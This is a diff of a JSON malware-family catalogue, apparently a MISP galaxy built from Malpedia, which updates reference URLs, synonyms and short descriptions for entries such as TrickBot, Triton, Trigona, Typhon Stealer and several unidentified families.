+ "https://intel471.com/blog/privateloader-malware",
+ "https://labs.sentinelone.com/deep-dive-into-trickbot-executor-module-mexec-hidden-anchor-bot-nexus-operations/",
+ "https://twitter.com/anthomsec/status/1321865315513520128",
+ "https://go.recordedfuture.com/hubfs/reports/cta-2021-1112.pdf",
+ "https://elis531989.medium.com/the-chronicles-of-bumblebee-the-hook-the-bee-and-the-trickbot-connection-686379311056",
+ "https://blog.cyberint.com/ryuk-crypto-ransomware",
+ "https://www.cyberbit.com/blog/endpoint-security/latest-trickbot-variant-has-new-tricks-up-its-sleeve/",
+ "https://www.bleepingcomputer.com/news/security/trickbot-malware-mistakenly-warns-victims-that-they-are-infected/",
+ "https://github.com/JR0driguezB/malware_configs/tree/master/TrickBot",
+ "https://redcanary.com/resources/webinars/deep-dive-process-injection/",
+ "https://www.advintel.io/post/advintel-s-state-of-emotet-aka-spmtools-displays-over-million-compromised-machines-through-2022",
+ "http://www.vkremez.com/2018/04/lets-learn-trickbot-implements-network.html",
"https://medium.com/walmartglobaltech/anchor-and-lazarus-together-again-24744e516607",
- "https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/"
+ "https://noticeofpleadings.com/trickbot/files/Complaint%20and%20Summons/2020-10-06%20Trickbot%201%20Complaint%20with%20exs.pdf",
+ "https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko",
+ "https://www.vkremez.com/2018/11/lets-learn-introducing-latest-trickbot.html",
+ "https://labs.sentinelone.com/enter-the-maze-demystifying-an-affiliate-involved-in-maze-snow/",
+ "https://labs.sentinelone.com/inside-a-trickbot-cobaltstrike-attack-server/",
+ "https://unit42.paloaltonetworks.com/wireshark-tutorial-emotet-infection/",
+ "https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree",
+ "https://www.bleepingcomputer.com/news/security/ryuk-ransomware-attacked-epiq-global-via-trickbot-infection/",
+ "https://public.intel471.com/blog/trickbot-update-november-2020-bazar-loader-microsoft/",
+ "https://hello.global.ntt/en-us/insights/blog/trickbot-variant-communicating-over-dns",
+ "https://threatpost.com/conti-ransomware-v-3-including-decryptor-leaked/179006/",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/trickbot-botnet-ransomware-disruption",
+ "https://blog.malwarebytes.com/threat-analysis/2016/10/trick-bot-dyrezas-successor/",
+ "https://securityintelligence.com/posts/trickbot-survival-instinct-trickboot-version/",
+ "https://www.kryptoslogic.com/blog/2021/02/trickbot-masrv-module/",
+ "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
+ "https://www.justice.gov/opa/pr/latvian-national-charged-alleged-role-transnational-cybercrime-organization",
+ "https://www.europol.europa.eu/newsroom/news/12-targeted-for-involvement-in-ransomware-attacks-against-critical-infrastructure",
+ "https://blog.vincss.net/2021/10/re025-trickbot-many-tricks.html",
+ "https://www.proofpoint.com/us/blog/security-briefs/threat-actors-pair-tax-themed-lures-covid-19-healthcare-themes",
+ "https://cyber.wtf/2020/08/31/trickbot-rdpscandll-password-transof/",
+ "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/",
+ "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/",
+ "https://www.secureworks.com/research/threat-profiles/gold-blackburn",
+ "https://malware.love/trickbot/malware_analysis/reverse_engineering/2020/11/17/trickbots-latest-trick.html",
+ "https://securityintelligence.com/posts/itg08-aka-fin6-partners-with-trickbot-gang-uses-anchor-framework/",
+ "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/conti-leaks-examining-the-panama-papers-of-ransomware.html",
+ "https://www.youtube.com/watch?v=lTywPmZEU1A",
+ "https://therecord.media/us-arrests-latvian-woman-who-worked-on-trickbot-malware-source-code/",
+ "https://medium.com/walmartglobaltech/inside-the-systembc-malware-as-a-service-9aa03afd09c6",
+ "https://krebsonsecurity.com/2022/03/conti-ransomware-group-diaries-part-ii-the-office/",
+ "http://www.vkremez.com/2017/11/lets-learn-trickbot-socks5-backconnect.html",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-006.pdf",
+ "https://www.webroot.com/blog/2018/03/21/trickbot-banking-trojan-adapts-new-module/",
+ "https://www.advanced-intel.com/post/trickbot-group-launches-test-module-alerting-on-fraud-activity",
+ "http://www.vkremez.com/2017/12/lets-learn-introducing-new-trickbot.html",
+ "https://therecord.media/trickbot-new-attacks-see-the-botnet-deploy-new-banking-module-new-ransomware/",
+ "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf",
+ "https://intel471.com/blog/conti-leaks-ransomware-development",
+ "https://blog.intel471.com/2020/04/14/understanding-the-relationship-between-emotet-ryuk-and-trickbot/",
+ "https://www.ringzerolabs.com/2017/07/trickbot-banking-trojan-doc00039217doc.html",
+ "https://www.wired.co.uk/article/trickbot-malware-group-internal-messages",
+ "https://www.justice.gov/opa/press-release/file/1445241/download",
+ "https://blog.reversinglabs.com/blog/conversinglabs-ep-2-conti-pivots-as-ransomware-as-a-service-struggles",
+ "https://www.cybereason.com/blog/cybereason-vs.-ryuk-ransomware",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker",
+ "https://malware.love/trickbot/malware_analysis/reverse_engineering/2020/11/22/trickbot-fake-ips-part2.html",
+ "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf",
+ "https://blog.talosintelligence.com/2018/07/smoking-guns-smoke-loader-learned-new.html",
+ "https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/",
+ "https://content.fireeye.com/m-trends/rpt-m-trends-2020",
+ "https://medium.com/walmartglobaltech/trickbot-crews-new-cobaltstrike-loader-32c72b78e81c",
+ "https://unit42.paloaltonetworks.com/sandbox-evasion-memory-detection/",
+ "https://blogs.microsoft.com/on-the-issues/2020/10/20/trickbot-ransomware-disruption-update/",
+ "https://public.intel471.com/blog/global-trickbot-disruption-operation-shows-promise/",
+ "https://www.cyberark.com/resources/threat-research-blog/conti-group-leaked",
+ "https://www.heise.de/security/artikel/Emotet-Trickbot-Ryuk-ein-explosiver-Malware-Cocktail-4573848.html",
+ "https://www.hornetsecurity.com/en/security-information/trickbot-malspam-leveraging-black-lives-matter-as-lure/",
+ "https://www.intrinsec.com/deobfuscating-hunting-ostap/",
+ "https://www.slideshare.net/proidea_conferences/inside-cybercrime-groups-harvesting-active-directory-for-fun-and-profit-vitali-kremez",
+ "https://labs.sentinelone.com/revealing-the-trick-a-deep-dive-into-trickloader-obfuscation/",
+ "https://engineering.salesforce.com/easily-identify-malicious-servers-on-the-internet-with-jarm-e095edac525a",
+ "https://research.checkpoint.com/2023/following-the-scent-of-trickgate-6-year-old-packer-used-to-deploy-the-most-wanted-malware/",
+ "https://securityintelligence.com/posts/from-ramnit-to-bumblebee-via-neverquest",
+ "https://www.bleepingcomputer.com/news/security/conti-ransomware-gang-takes-over-trickbot-malware-operation/",
+ "https://www.sophos.com/en-us/medialibrary/pdfs/technical-papers/sophos-2021-threat-report.pdf",
+ "https://www.justice.gov/opa/pr/officials-announce-international-operation-targeting-transnational-criminal-organization",
+ "https://securityintelligence.com/posts/trickbot-gang-template-based-metaprogramming-bazar-malware/",
+ "https://securityintelligence.com/trickbot-takes-to-latin-america-continues-to-expand-its-global-reach/",
+ "https://f5.com/labs/articles/threat-intelligence/malware/trickbot-expands-global-targets-beyond-banks-and-payment-processors-to-crms",
+ "https://securityintelligence.com/posts/trickbot-gang-doubles-down-enterprise-infection/",
+ "https://unit42.paloaltonetworks.com/trickbot-updates-password-grabber-module/",
+ "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_5_sajo-takeda-niwa_en.pdf",
+ "https://www.bleepingcomputer.com/news/security/malware-tries-to-trump-security-software-with-potus-impeachment/",
+ "https://www.fireeye.com/blog/threat-research/2019/01/a-nasty-trick-from-credential-theft-malware-to-business-disruption.html",
+ "https://thehackernews.com/2022/05/malware-analysis-trickbot.html",
+ "https://go.recordedfuture.com/hubfs/reports/cta-2022-0118.pdf",
+ "https://unit42.paloaltonetworks.com/goodbye-mworm-hello-nworm-trickbot-updates-propagation-module/",
+ "https://qmemcpy.io/post/reverse-engineering-malware-trickbot-part-2-loader",
+ "https://www.bleepingcomputer.com/news/security/trickbot-now-uses-a-windows-10-uac-bypass-to-evade-detection/",
+ "https://blog.fraudwatchinternational.com/malware/trickbot-malware-works",
+ "https://www.bleepingcomputer.com/news/security/cisa-updates-conti-ransomware-alert-with-nearly-100-domain-names/",
+ "https://securityintelligence.com/posts/trickbot-bolsters-layered-defenses-prevent-injection/",
+ "https://www.lastline.com/labsblog/evolution-of-excel-4-0-macro-weaponization/",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/trickbot-adds-remote-application-credential-grabbing-capabilities-to-its-repertoire/",
+ "https://www.bleepingcomputer.com/news/security/trickbot-uses-a-new-windows-10-uac-bypass-to-launch-quietly/",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf",
+ "https://share.vx-underground.org/Conti/",
+ "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
+ "https://www.berlin.de/sen/justva/presse/pressemitteilungen/2020/pm-11-2020-t-systems-forensik_bericht_public_v1.pdf",
+ "https://www.npu.gov.ua/news/kiberzlochini/kiberpolicziya-vikrila-transnaczionalne-zlochinne-ugrupovannya-u-nanesenni-inozemnim-kompaniyam-120-miljoniv-dolariv-zbitkiv/",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/latest-trickbot-campaign-delivered-via-highly-obfuscated-js-file/",
+ "https://thehackernews.com/2022/02/notorious-trickbot-malware-gang-shuts.html",
+ "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/evolving-trickbot-adds-detection-evasion-and-screen-locking-features",
+ "https://blog.talosintelligence.com/2021/10/threat-hunting-in-large-datasets-by.html",
+ "https://securityaffairs.co/wordpress/128190/cyber-crime/conti-ransomware-takes-over-trickbot.html",
+ "https://www.youtube.com/watch?v=Brx4cygfmg8",
+ "https://duo.com/decipher/trickbot-up-to-its-old-tricks",
+ "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware",
+ "https://www.netscout.com/blog/asert/dropping-anchor",
+ "https://twitter.com/VK_Intel/status/1328578336021483522",
+ "https://securelist.com/financial-cyberthreats-in-2020/101638/",
+ "https://www.cyberbit.com/latest-trickbot-variant-has-new-tricks-up-its-sleeve/",
+ "https://intel471.com/blog/a-brief-history-of-ta505",
+ "https://eclypsium.com/2020/12/03/trickbot-now-offers-trickboot-persist-brick-profit/",
+ "https://public.intel471.com/blog/partners-in-crime-north-koreans-and-elite-russian-speaking-cybercriminals/",
+ "https://www.deepinstinct.com/2019/07/12/trickbooster-trickbots-email-based-infection-module/",
+ "https://eclypsium.com/2022/06/02/conti-targets-critical-firmware/",
+ "https://blog.lumen.com/a-look-inside-the-trickbot-botnet/",
+ "https://research.checkpoint.com/2021/when-old-friends-meet-again-why-emotet-chose-trickbot-for-rebirth/",
+ "https://www.fortinet.com/blog/threat-research/new-variant-of-trickbot-being-spread-by-word-document.html",
+ "https://unit42.paloaltonetworks.com/wireshark-tutorial-examining-trickbot-infections/"
],
"synonyms": [
"TheTrick",
@@ -45529,29 +47974,44 @@
"uuid": "c824813c-9c79-4917-829a-af72529e8329",
"value": "TrickBot"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.trigona",
+ "https://unit42.paloaltonetworks.com/trigona-ransomware-update/",
+ "https://www.fortinet.com/blog/threat-research/ransomware-roundup-trigona-ransomware"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "d5e900b0-5a6d-4e29-ab64-fa72863198a1",
+ "value": "Trigona"
+ },
{
"description": "Malware attacking commonly used in Industrial Control Systems (ICS) Triconex Safety Instrumented System (SIS) controllers.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.triton",
- "https://www.cisa.gov/uscert/sites/default/files/publications/AA22-110A_Joint_CSA_Russian_State-Sponsored_and_Criminal_Cyber_Threats_to_Critical_Infrastructure_4_20_22_Final.pdf",
- "https://us-cert.cisa.gov/sites/default/files/documents/MAR-17-352-01%20HatMan%20-%20Safety%20System%20Targeted%20Malware%20%28Update%20A%29_S508C.PDF",
- "https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1538425180.pdf",
- "https://www.cisa.gov/uscert/ncas/alerts/aa22-083a",
- "https://www.eenews.net/stories/1060123327/",
- "https://www.fireeye.com/blog/threat-research/2017/12/attackers-deploy-new-ics-attack-framework-triton.html",
- "https://dragos.com/blog/trisis/TRISIS-01.pdf",
- "https://www.nozominetworks.com//downloads/US/Nozomi-Networks-TRITON-The-First-SIS-Cyberattack.pdf",
- "https://www.cisa.gov/uscert/ncas/alerts/aa22-110a",
- "https://www.ic3.gov/Media/News/2022/220325.pdf",
- "https://home.treasury.gov/news/press-releases/sm1162",
- "https://www.fireeye.com/blog/threat-research/2018/10/triton-attribution-russian-government-owned-lab-most-likely-built-tools.html",
- "https://securelist.com/apt-trends-report-q2-2019/91897/",
- "https://github.com/ICSrepo/TRISIS-TRITON-HATMAN",
- "https://www.midnightbluelabs.com/blog/2018/1/16/analyzing-the-triton-industrial-malware",
- "https://www.ironnet.com/blog/russian-cyber-attack-campaigns-and-actors",
"https://ics-cert.us-cert.gov/sites/default/files/documents/MAR-17-352-01%20HatMan%E2%80%94Safety%20System%20Targeted%20Malware_S508C.pdf",
- "https://www.domaintools.com/resources/blog/visibility-monitoring-and-critical-infrastructure-security"
+ "https://www.eenews.net/stories/1060123327/",
+ "https://dragos.com/blog/trisis/TRISIS-01.pdf",
+ "https://www.cisa.gov/uscert/ncas/alerts/aa22-110a",
+ "https://www.domaintools.com/resources/blog/visibility-monitoring-and-critical-infrastructure-security",
+ "https://www.fireeye.com/blog/threat-research/2018/10/triton-attribution-russian-government-owned-lab-most-likely-built-tools.html",
+ "https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1538425180.pdf",
+ "https://www.ironnet.com/blog/russian-cyber-attack-campaigns-and-actors",
+ "https://www.fireeye.com/blog/threat-research/2017/12/attackers-deploy-new-ics-attack-framework-triton.html",
+ "https://www.nozominetworks.com//downloads/US/Nozomi-Networks-TRITON-The-First-SIS-Cyberattack.pdf",
+ "https://www.mandiant.com/resources/mandiant-red-team-emulates-fin11-tactics",
+ "https://www.ic3.gov/Media/News/2022/220325.pdf",
+ "https://www.midnightbluelabs.com/blog/2018/1/16/analyzing-the-triton-industrial-malware",
+ "https://github.com/ICSrepo/TRISIS-TRITON-HATMAN",
+ "https://home.treasury.gov/news/press-releases/sm1162",
+ "https://securelist.com/apt-trends-report-q2-2019/91897/",
+ "https://us-cert.cisa.gov/sites/default/files/documents/MAR-17-352-01%20HatMan%20-%20Safety%20System%20Targeted%20Malware%20%28Update%20A%29_S508C.PDF",
+ "https://www.cisa.gov/uscert/ncas/alerts/aa22-083a",
+ "https://www.cisa.gov/uscert/sites/default/files/publications/AA22-110A_Joint_CSA_Russian_State-Sponsored_and_Criminal_Cyber_Threats_to_Critical_Infrastructure_4_20_22_Final.pdf"
],
"synonyms": [
"HatMan",
@@ -45567,20 +48027,20 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.trochilus_rat",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/webworm-espionage-rats",
"https://www.trendmicro.com/vinfo/us/security/news/cyber-attacks/operation-drbcontrol-uncovering-a-cyberespionage-campaign-targeting-gambling-companies-in-southeast-asia",
- "https://www.botconf.eu/wp-content/uploads/2022/05/Botconf2022-40-LunghiHorejsi.pdf",
- "https://blogs.jpcert.or.jp/en/2017/04/redleaves---malware-based-on-open-source-rat.html",
- "https://github.com/m0n0ph1/malware-1/tree/master/Trochilus",
+ "https://github.com/5loyd/trochilus/",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/webworm-espionage-rats",
"https://www.sstic.org/media/SSTIC2020/SSTIC-actes/pivoter_tel_bernard_ou_comment_monitorer_des_attaq/SSTIC2020-Slides-pivoter_tel_bernard_ou_comment_monitorer_des_attaquants_ngligents-lunghi.pdf",
- "https://www.secureworks.com/research/bronze-vinewood-targets-supply-chains",
- "https://www.secureworks.com/research/threat-profiles/bronze-vinewood",
- "https://app.box.com/s/z1uanuv1vn3vw5iket1r6bqrmlra0gpn",
- "https://raw.githubusercontent.com/yt0ng/cracking_softcell/main/Cracking_SOFTCLL_TLP_WHITE.pdf",
- "https://go.recordedfuture.com/hubfs/reports/cta-2019-0206.pdf",
"https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/espionage-asia-governments",
+ "https://www.botconf.eu/wp-content/uploads/2022/05/Botconf2022-40-LunghiHorejsi.pdf",
+ "https://www.secureworks.com/research/threat-profiles/bronze-vinewood",
+ "https://raw.githubusercontent.com/yt0ng/cracking_softcell/main/Cracking_SOFTCLL_TLP_WHITE.pdf",
+ "https://www.secureworks.com/research/bronze-vinewood-targets-supply-chains",
"https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf",
- "https://github.com/5loyd/trochilus/"
+ "https://github.com/m0n0ph1/malware-1/tree/master/Trochilus",
+ "https://app.box.com/s/z1uanuv1vn3vw5iket1r6bqrmlra0gpn",
+ "https://blogs.jpcert.or.jp/en/2017/04/redleaves---malware-based-on-open-source-rat.html",
+ "https://go.recordedfuture.com/hubfs/reports/cta-2019-0206.pdf"
],
"synonyms": [],
"type": []
@@ -45589,19 +48049,19 @@
"value": "Trochilus RAT"
},
{
- "description": "",
+ "description": "According to Malwarebyte, Ransomware is a type of malware that prevents users from accessing their system or personal files and demands ransom payment in order to regain access. Ransom.Troldesh is spread by malspam, typically in the form of attached .zip files. This ransomware sometimes uses a CMS on a compromised site to host downloads.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.troldesh",
- "https://blog.checkpoint.com/2015/06/01/troldesh-new-ransomware-from-russia/",
- "https://isc.sans.edu/forums/diary/More+Russian+language+malspam+pushing+Shade+Troldesh+ransomware/24668/",
- "https://blogs.technet.microsoft.com/mmpc/2016/07/13/troldesh-ransomware-influenced-by-the-da-vinci-code/",
- "https://labs.bitdefender.com/2020/05/shade-troldesh-ransomware-decryption-tool/",
- "https://securelist.com/the-shade-encryptor-a-double-threat/72087/",
- "https://unit42.paloaltonetworks.com/shade-ransomware-hits-high-tech-wholesale-education-sectors-in-u-s-japan-india-thailand-canada/",
- "https://support.kaspersky.com/13059",
"https://blog.avast.com/ransomware-strain-troldesh-spikes",
"https://www.zdnet.com/article/shade-troldesh-ransomware-shuts-down-and-releases-all-decryption-keys/",
+ "https://support.kaspersky.com/13059",
+ "https://blogs.technet.microsoft.com/mmpc/2016/07/13/troldesh-ransomware-influenced-by-the-da-vinci-code/",
+ "https://labs.bitdefender.com/2020/05/shade-troldesh-ransomware-decryption-tool/",
+ "https://unit42.paloaltonetworks.com/shade-ransomware-hits-high-tech-wholesale-education-sectors-in-u-s-japan-india-thailand-canada/",
+ "https://blog.checkpoint.com/2015/06/01/troldesh-new-ransomware-from-russia/",
+ "https://isc.sans.edu/forums/diary/More+Russian+language+malspam+pushing+Shade+Troldesh+ransomware/24668/",
+ "https://securelist.com/the-shade-encryptor-a-double-threat/72087/",
"https://github.com/shade-team/keys",
"https://www.welivesecurity.com/2019/01/28/russia-hit-new-wave-ransomware-spam/"
],
@@ -45681,8 +48141,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.turian",
- "https://www.welivesecurity.com/2021/06/10/backdoordiplomacy-upgrading-quarian-turian/",
- "https://www.fortinet.com/blog/threat-research/analysis-of-follina-zero-day"
+ "https://unit42.paloaltonetworks.com/playful-taurus/",
+ "https://www.fortinet.com/blog/threat-research/analysis-of-follina-zero-day",
+ "https://www.welivesecurity.com/2021/06/10/backdoordiplomacy-upgrading-quarian-turian/"
],
"synonyms": [],
"type": []
@@ -45709,9 +48170,12 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.turla_rpc",
"https://www.welivesecurity.com/2019/05/29/turla-powershell-usage/",
+ "https://cocomelonc.github.io/tutorial/2022/05/02/malware-pers-3.html",
+ "https://cocomelonc.github.io/malware/2022/09/20/malware-pers-11.html",
+ "https://unit42.paloaltonetworks.com/ironnetinjector/",
+ "https://cocomelonc.github.io/tutorial/2022/06/12/malware-pers-7.html",
"https://www.accenture.com/us-en/blogs/cyber-defense/turla-belugasturgeon-compromises-government-entity",
- "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
- "https://unit42.paloaltonetworks.com/ironnetinjector/"
+ "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf"
],
"synonyms": [],
"type": []
@@ -45724,10 +48188,11 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.turla_silentmoon",
- "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
+ "https://twitter.com/Arkbird_SOLG/status/1304187749373800455",
"https://www.emanueledelucia.net/the-bigboss-rules-something-about-one-of-the-uroburos-rpc-based-backdoors/",
+ "https://cocomelonc.github.io/tutorial/2022/06/12/malware-pers-7.html",
"https://www.accenture.com/us-en/blogs/cyber-defense/turla-belugasturgeon-compromises-government-entity",
- "https://twitter.com/Arkbird_SOLG/status/1304187749373800455"
+ "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf"
],
"synonyms": [
"BigBoss",
@@ -45745,11 +48210,11 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.turnedup",
- "https://www.cyberbit.com/blog/endpoint-security/new-early-bird-code-injection-technique-discovered/",
- "https://www.cyberbit.com/new-early-bird-code-injection-technique-discovered/",
"https://symantec-blogs.broadcom.com/blogs/threat-intelligence/elfin-apt33-espionage",
- "https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html",
- "https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage"
+ "https://www.cyberbit.com/new-early-bird-code-injection-technique-discovered/",
+ "https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage",
+ "https://www.cyberbit.com/blog/endpoint-security/new-early-bird-code-injection-technique-discovered/",
+ "https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html"
],
"synonyms": [
"Notestuk"
@@ -45764,8 +48229,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.typehash",
- "https://vblocalhost.com/uploads/VB2020-Lunghi-Horejsi.pdf",
- "https://www.ptsecurity.com/upload/corporate/ww-en/pt-esc/winnti-2020-eng.pdf"
+ "https://www.ptsecurity.com/upload/corporate/ww-en/pt-esc/winnti-2020-eng.pdf",
+ "https://vblocalhost.com/uploads/VB2020-Lunghi-Horejsi.pdf"
],
"synonyms": [
"SkinnyD"
@@ -45775,6 +48240,21 @@
"uuid": "d7b0ccc8-051c-4ab1-908e-3bd1811d9e2e",
"value": "TypeHash"
},
+ {
+ "description": "According to PCrisk, Typhon is a stealer-type malware written in the C# programming language. Newer versions of this program are called Typhon Reborn (TyphonReborn). Malware within this classification is designed to extract data from infected systems. The older variants of Typhon have a broader range of functionalities, while Typhon Reborn versions are streamlined stealers.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.typhon_stealer",
+ "https://blog.talosintelligence.com/typhon-reborn-v2-features-enhanced-anti-analysis/"
+ ],
+ "synonyms": [
+ "Typhon Reborn V2"
+ ],
+ "type": []
+ },
+ "uuid": "fb5e364c-0f91-4b35-89cc-52eb4fc2a338",
+ "value": "Typhon Stealer"
+ },
{
"description": "",
"meta": {
@@ -45839,8 +48319,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.udpos",
- "https://www.forcepoint.com/blog/x-labs/udpos-exfiltrating-credit-card-data-dns",
- "https://threatmatrix.cylance.com/en_us/home/threat-spotlight-inside-udpos-malware.html"
+ "https://threatmatrix.cylance.com/en_us/home/threat-spotlight-inside-udpos-malware.html",
+ "https://www.forcepoint.com/blog/x-labs/udpos-exfiltrating-credit-card-data-dns"
],
"synonyms": [],
"type": []
@@ -46213,19 +48693,6 @@
"uuid": "969d1054-b917-4fb8-b3f8-1e33926fdb65",
"value": "Unidentified 061"
},
- {
- "description": "",
- "meta": {
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_063",
- "https://twitter.com/KevinPerlow/status/1160766519615381504"
- ],
- "synonyms": [],
- "type": []
- },
- "uuid": "d34ac949-3816-436b-a719-b4ced192388e",
- "value": "Unidentified 063 (Lazarus Keylogger)"
- },
{
"description": "This .net executable can receive commands from c2 sever, upload and download files according to the returned content, perform an uninstall, or modify the registry to achieve persistence across reboots. At the end, it downloads a Python-based RAT, called PeppyRAT.",
"meta": {
@@ -46349,8 +48816,8 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_076",
"https://www.youtube.com/watch?v=8x-pGlWpIYI",
- "https://www.zscaler.com/blogs/research/return-higaisa-apt",
- "https://blog.bushidotoken.net/2020/06/deep-dive-darkhotel-apt.html"
+ "https://blog.bushidotoken.net/2020/06/deep-dive-darkhotel-apt.html",
+ "https://www.zscaler.com/blogs/research/return-higaisa-apt"
],
"synonyms": [],
"type": []
@@ -46467,9 +48934,12 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_089",
- "https://kienmanowar.wordpress.com/2022/01/26/quicknote-analysis-of-malware-suspected-to-be-an-apt-attack-targeting-vietnam/"
+ "https://kienmanowar.wordpress.com/2022/01/26/quicknote-analysis-of-malware-suspected-to-be-an-apt-attack-targeting-vietnam/",
+ "https://research.checkpoint.com/2023/pandas-with-a-soul-chinese-espionage-attacks-against-southeast-asian-government-entities/"
+ ],
+ "synonyms": [
+ "5.t Downloader"
],
- "synonyms": [],
"type": []
},
"uuid": "685c9c30-aa9f-43ee-a262-43c17c350049",
@@ -46480,7 +48950,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_090",
- "https://cybergeeks.tech/a-detailed-analysis-of-lazarus-malware-disguised-as-notepad-shell-extension/"
+ "https://cybergeeks.tech/a-detailed-analysis-of-lazarus-malware-disguised-as-notepad-shell-extension/",
+ "https://cocomelonc.github.io/tutorial/2021/09/06/simple-malware-av-evasion-2.html"
],
"synonyms": [],
"type": []
@@ -46540,6 +49011,130 @@
"uuid": "db8f94e9-768d-4ad1-befb-55b4b820174f",
"value": "Unidentified 094"
},
+ {
+ "description": "Wiper, using EldoS RawDisk for low level access to disks.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_095",
+ "https://www.cisa.gov/uscert/sites/default/files/publications/aa22-264a-iranian-cyber-actors-conduct-cyber-operations-against-the-government-of-albania.pdf",
+ "https://www.cisa.gov/uscert/ncas/alerts/aa22-264a"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "925f7a39-9674-4209-a31a-e09c27117328",
+ "value": "Unidentified 095 (Iranian Wiper)"
+ },
+ {
+ "description": "Keylogger.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_096",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/witchetty-steganography-espionage"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "0c87cf0d-fa54-4962-817d-eac4c817b21a",
+ "value": "Unidentified 096 (Keylogger)"
+ },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_097",
+ "https://www.bleepingcomputer.com/news/security/hacking-group-polonium-uses-creepy-malware-against-israel/",
+ "https://www.welivesecurity.com/2022/10/11/polonium-targets-israel-creepy-malware/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "32fe5b04-1af6-4696-a329-604a9f637c85",
+ "value": "Unidentified 097 (Polonium Keylogger)"
+ },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_098",
+ "https://ti.qianxin.com/blog/articles/analysis-of-apt29%27s-attack-activities-against-italy/",
+ "https://www.freebuf.com/articles/paper/339618.html",
+ "https://cert-agid.gov.it/news/il-malware-envyscout-apt29-e-stato-veicolato-anche-in-italia/",
+ "https://r136a1.info/2022/07/19/a-look-into-apt29s-new-early-stage-google-drive-downloader/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "db87fd2d-08ff-431d-86b8-35e31c9fcc9b",
+ "value": "Unidentified 098 (APT29 Slack Downloader)"
+ },
+ {
+ "description": "This malware uses DropBox for C2 and was spread via spear-phishing attack at government organizations. It is different from win.boombox, which is another APT29 attributed malware using DropBox (written in .NET).",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_099",
+ "https://www.incibe-cert.es/sites/default/files/contenidos/estudios/doc/incibe-cert_estudio_analisis_nobelium_2022_v1.pdf",
